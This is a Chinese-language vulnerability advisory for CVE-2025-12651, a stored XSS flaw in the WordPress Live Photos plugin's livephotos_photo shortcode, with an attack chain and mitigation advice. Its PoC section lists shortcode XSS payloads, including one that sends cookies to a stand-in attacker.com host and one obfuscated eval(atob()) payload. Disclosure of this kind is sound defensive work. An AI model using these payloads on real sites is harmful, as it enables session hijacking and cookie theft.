IPBUF安全漏洞报告
English
CVE-2025-12651 CVSS 6.4 中危

CVE-2025-12651 WordPress Live Photos插件存储型XSS漏洞

披露日期: 2025-11-11
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-12651
漏洞类型
存储型跨站脚本(Stored XSS)
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
WordPress Live Photos plugin

相关标签

CVE-2025-12651存储型XSSWordPress插件漏洞短代码注入WordPress安全Live Photos跨站脚本认证用户攻击

漏洞概述

WordPress的Live Photos插件在0.1及以下所有版本中存在存储型跨站脚本(Stored XSS)漏洞。该漏洞源于livephotos_photo短代码对用户提供的属性参数(video_src、img_src、class)缺乏充分的输入清理和输出转义。攻击者通过利用此漏洞,可以在页面中注入任意Web脚本。由于漏洞性质为存储型,恶意脚本会被永久保存在服务器端,当其他用户访问包含恶意内容的页面时,注入的脚本将自动执行,可能导致会话劫持、敏感信息窃取、网页篡改等严重后果。

技术细节

该漏洞存在于WordPress Live Photos插件的短代码处理模块中,具体位置为core/class-livephotos-shortcodes.php第42行附近的代码。问题根源在于插件在处理livephotos_photo短代码时,直接将用户可控的参数值输出到HTML页面,而未进行适当的输入验证和输出编码。攻击者(拥有贡献者级别或更高权限的认证用户)可以通过在video_src、img_src或class参数中注入恶意脚本内容。例如,在img_src参数中插入带有onerror事件处理器的img标签,或在class参数中注入带有点击事件处理器的代码。由于这些参数值被直接存储并在前端页面中呈现,任何访问该页面的用户都会触发恶意脚本执行。

攻击链分析

STEP 1
步骤1
攻击者获取WordPress网站的有效账户(贡献者级别或更高权限)
STEP 2
步骤2
攻击者在页面编辑器中创建或编辑文章/页面,插入包含XSS payload的livephotos_photo短代码
STEP 3
步骤3
短代码参数(img_src、video_src、class)中的恶意脚本内容被保存到数据库,未经过充分清理和转义
STEP 4
步骤4
当其他用户访问包含该短代码的页面时,未转义的恶意脚本随页面HTML一同返回到用户浏览器
STEP 5
步骤5
用户浏览器执行注入的恶意JavaScript代码,导致会话劫持、Cookie窃取或执行攻击者指定的其他操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- WordPress Live Photos Plugin - Stored XSS PoC --> <!-- Required: Contributor-level access or higher --> <!-- Method 1: Using img_src parameter --> [livephotos_photo img_src='x' onerror='alert(document.cookie)' video_src=''] <!-- Method 2: Using class parameter with event handler --> [livephotos_photo img_src='' video_src='' class='" onmouseover="alert(1)" x="'] <!-- Method 3: Using video_src parameter --> [livephotos_photo img_src='' video_src='x' onerror='fetch("https://attacker.com/steal?c="+document.cookie)'] <!-- Method 4: Combined payload for reliable execution --> [livephotos_photo img_src='x' onerror='eval(atob("YWxlcnQoJ1gnJyk="))' video_src='' class='test'] <!-- The injected JavaScript will execute when any user views the page containing the shortcode -->

影响范围

WordPress Live Photos plugin <= 0.1

防御指南

临时缓解措施
在官方修复版本发布之前,建议临时禁用Live Photos插件或限制低权限用户的文章发布权限。同时可部署Web应用防火墙(WAF)规则过滤包含script标签、onerror、onload等XSS特征的请求参数。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表